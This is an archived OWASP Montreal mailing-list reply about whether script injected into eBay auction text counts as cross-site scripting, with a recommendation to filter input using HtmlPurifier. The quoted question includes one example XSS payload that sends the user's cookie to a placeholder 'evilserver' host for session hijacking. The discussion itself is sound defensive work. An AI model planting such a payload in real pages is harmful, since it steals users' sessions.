[ OWASP - Montreal ] Confusion about XSS...
Sean Coates
sean at caedmon.net
Wed Dec 17 14:13:44 EST 2008
> Am I wrong, or to be declared as XSS vuln. the script must be
> injected from an external source, not the site itself?
>
> What if ebay allow html script tags in the auction text, is it an
> XSS? If not how do you call this? The site is the source...
>
> "Watch for sale. <script type="text/javascript">document.location="http://evilserver/stealcookie.php?
> "%2bdocument.cookie</script>"
>
> This script would send the authenticated user cookie to the
> attacker, allowing session hijacking.
I would consider that a form of cross site scripting, even if it's not
technically "cross site." eBay definitely should be filtering that
out... think "Samy is my hero."
This is where HtmlPurifier serves well (-:
S
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-montreal/attachments/20081217/5e2e85b9/attachment.html
More information about the Owasp-montreal
mailing list